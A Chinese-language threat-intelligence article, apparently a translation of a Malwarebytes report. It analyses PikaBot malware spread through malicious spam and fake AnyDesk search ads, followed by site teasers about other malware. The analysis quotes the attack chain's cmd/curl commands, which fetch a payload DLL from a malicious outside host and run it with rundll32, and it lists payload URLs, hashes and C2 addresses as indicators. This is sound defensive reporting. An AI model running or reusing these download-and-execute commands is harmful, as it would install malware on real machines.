深度分析PikaBot如何通过恶意搜索广告实现大规模传播和入侵感染

VSole2024-01-23 10:35:23

写在前面的话


在过去的2023年里,Malwarebytes Labs的研究人员发现通过恶意广告实现网络攻击的活动数量有所增加,特别是通过搜索引擎投放的针对企业组织的恶意广告行为。如果要将社工活动包括进来的话,相当于是基于浏览器的攻击活动数量增加了不少。


网络犯罪分子经常会通过搜索广告来感染新的目标用户,研究人员认为,目前社区或暗网市场中有专门的服务可以帮助恶意软件分发者和网络犯罪组织绕过Google的安全措施并帮助他们建立攻击诱饵基础设施。



在这篇文章中,我们将对一个名为PikaBot的恶意活动进行分析,并提供跟该活动相关的详细信息和入侵威胁指标IoC。这是一个出现于2023年的新型恶意软件家族,PikaBot目前主要通过恶意广告来实现大规模感染和入侵。值得一提的是,PikaBot现在已经成为了网络犯罪组织TA577的首选Payload之一。


PikaBot与恶意垃圾邮件的关联


早在2023年2月份,Unit 42的研究人员就发现并识别了PikaBot的活动,当时的PikaBot主要通过恶意垃圾邮件活动进行传播,并由Matanbuchus恶意软件分发和感染。


继QakBot僵尸网络于2023年8月份退出历史舞台之后,Cofense的研究人员便观察到了同时传播 DarkGate 和 PikaBot 的恶意垃圾邮件活动有所增加。ikaBot的典型分发链通常以包含外部网站链接的电子邮件(劫持线程)作为开端,并诱骗目标用户下载包含恶意JavaScript文件的ZIP压缩文件:



随后,恶意JavaScript文件将会在目标设备上创建一个随机目录结构,并通过curl工具从一个外部网站获取和下载恶意Payload:


"C:\Windows\System32\cmd.exe" /c mkdir C:\Gkooegsglitrg\Dkrogirbksri & curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll
curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll


接下来,该脚本便会通过rundll32来执行Payload(一个DLL文件):


rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter


根据OALbas研究人员的描述,恶意脚本随后便会将PikaBot的核心模块注入到合法的SearchProtocolHost.exe进程中。除此之外,PikaBot的加载器还会通过使用间接系统调用来隐藏其注入行为,以此来增加感染的隐蔽性。


PikaBot正在通过恶意广告进行分发感染


该活动主要针对的是Google搜索中的远程应用程序AnyDesk,研究人员在对PikaBot的分发链进行分析后,发现并识别了该活动最终的Payload就是PikaBot。


除此之外,研究人员还在另外一个冒充AnyDesk品牌的恶意广告中发现了该活动:



点击该恶意广告之后,用户便会被重定向到一个预先设置好的诱饵网站(anadesky[.]ovmv[.]net):



点击下载按钮之后,下载下来的将是一个经过数字签名的MSI安装程序。需要注意的是,当时在分析该Payload时,它在VirusTotal上的检测结果为零。然而,更有趣的地方在于它实现检测绕过所使用的方法:



JoeSandbox的研究人员对PikaBot完整攻击流程的总结如下图所示:



与FakeBat类似的恶意广告活动


一直以来,威胁行为者都在尝试使用合法的广告营销平台和跟踪URL来绕过Google的安全检查,并将目标用户重定向到托管在Cloudflare中的自定义域名:



恶意行为者此时将会通过JavaScript来执行指纹识别,以确定目标用户是否处于虚拟机环境中。检测完成之后,目标用户才会被重定向到主登录页面,即诱饵AnyDesk网站。


有趣的是,当用户单击下载按钮时,会进行第二次指纹识别尝试,这种做法很可能是攻击者需要再次确保下载链接在虚拟化环境中不起作用。在这一个攻击活动中,攻击者托管恶意MSI安装程序时使用的是Dropbox。


研究人员还发现,PikaBot之前的恶意广告攻击链也使用了相同的重定向机制(域名为onelink[.]me)。这些攻击活动当时主要针对的是Zoom和Slack搜索广告,并已上报给了Google:



总结


在此之前,很多恶意软件主要通过浏览器插件漏洞来实现分发。但随着安全漏洞的不断修复,威胁行为者便将注意力转移到了垃圾邮件和恶意广告上。因此,恶意广告变成了另一种强大的传染媒介。


在这篇文章中,我们对PikaBot的恶意活动进行分析,并提供跟该活动相关的详细信息和入侵威胁指标IoC。广大企业组织和个人用户在搜索和点击任何广告内容时,都应该小心谨慎,确保终端用户访问的内容来自可信来源。


入侵威胁指标IoC


恶意域名


anadesky[.]ovmv[.]net

cxtensones[.]top

Dropbox Payload

dropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq

dropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu

dropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj


PikaBot哈希


0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5

da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff

69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320


PikaBot C2


172[.]232[.]186[.]251

57[.]128[.]83[.]129

57[.]128[.]164[.]11

57[.]128[.]108[.]132

139[.]99[.]222[.]29

172[.]232[.]164[.]77

54[.]37[.]79[.]82

172[.]232[.]162[.]198

57[.]128[.]109[.]221


参考资料


https://twitter.com/Unit42_Intel/status/1623349272061136900
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/
https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in-multinational-cyber-takedown
https://www.joesandbox.com/analysis/1362406/0/html


参考链接


https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads


软件广告
本作品采用《CC 协议》,转载必须注明作者和本文链接
据研究人员声称,间歇性加密让攻击者可以更有效地规避使用统计分析来检测当前勒索软件感染的系统。针对使用不同文件大小的BlackCat勒索软件的研究表明,间歇性加密为威胁分子在速度方面带来了显著优势。该勒索软件是用Go语言编写的,据开发人员声称,这有望加快勒索软件的运行,此外使用间歇性加密(图1)。PLAY勒索软件该勒索软件于2022年6月首次露面。
Qyick 勒索软件2022 年 8 月末,研究人员发现一个名为 lucrostm 的用户在地下犯罪论坛上宣传一种名为 Qyick 的新型勒索软件。BlackCat 背后的开发者于 2021 年 12 月初首次被发现在俄罗斯地下犯罪论坛上进行宣传
随着向更灵活的流行病劳动力转移和广为人知的殖民管道攻击,网络犯罪分子在针对政府、金融服务和娱乐等重要部门的活动。
近年来,通过这些恶意软件窃取的敏感信息在暗网上大肆销售,造成了巨大影响和危害。在新冠疫情期间,由于居家办公措施的实施,攻击者通过疫情主题的钓鱼邮件投递 Agent Tesla 和 Hawkeye 这两种键盘记录器。Genesis Store 在2020年利用 AZORult 获取目标主机的敏感信息。此外,随着居家办公措施的流行,远程登录场景变得非常普遍。购买付费的安全解决方案,扫描系统中存在的漏洞并进行修复。监控系统驱动和注册表的可疑变化,重点是对键盘输入的捕获。
sentinelone的研究人员对macOS恶意软件的2022年审查显示,运行macOS终端的企业和用户面临的攻击包括后门和跨平台攻击框架的增加。
自从计算机技术被广泛使用以来,恶意软件就一直以某种形式存在,但其存在的类型在不断发展演变。如今,随着人类社会数字化程度的不断提升,恶意软件已经成为现代企业组织面临的最严重安全威胁之一。
网络安全服务商Bitdefender公司日前发现了一个隐藏的恶意软件,该软件在全球各地的移动设备上未被发现已经超过六个月,该软件旨在向Android设备推送广告软件,以提高营收。到目前为止,该公司已经发现了6万多个感染了这种广告软件的安卓应用程序,并怀疑感染了更多的应用程序。
安全研究人员在 Google Play 上发现了 75 个应用程序,在 Apple 的 App Store 上发现了另外 10 个参与广告欺诈的应用程序,它们总共增加了 1300 万个安装量。
以色列《国土报》的一项调查显示,以色列软件制造商 Insanet 开发了一款名为 Sherlock 的间谍软件,将一些有针对性的广告变成特洛伊木马(非授权的远程控制程序)。据报道,该间谍软件无法防御,以色列政府已批准 Insanet 出售该技术。该公司声称间谍软件系统已被出售给一个非民主国家。
知名安全厂商Bitdefender 发布的一份报告称,他们在过去6个月中发现了 6万款不同类型的 Android 应用秘密地嵌入了广告软件安全程序。报告指出,经分析,该活动旨在将广告软件传播到用户的Android系统设备,以此来增加收入。Bitdefender 表示后一种意图在前两天被禁用,可能是为了逃避用户的检测。但目前,即便在Google Play 中也未必安全。通过 Google Play 上的应用程序在 Android 设备上竟安装了超过 4 亿次。
VSole
网络安全专家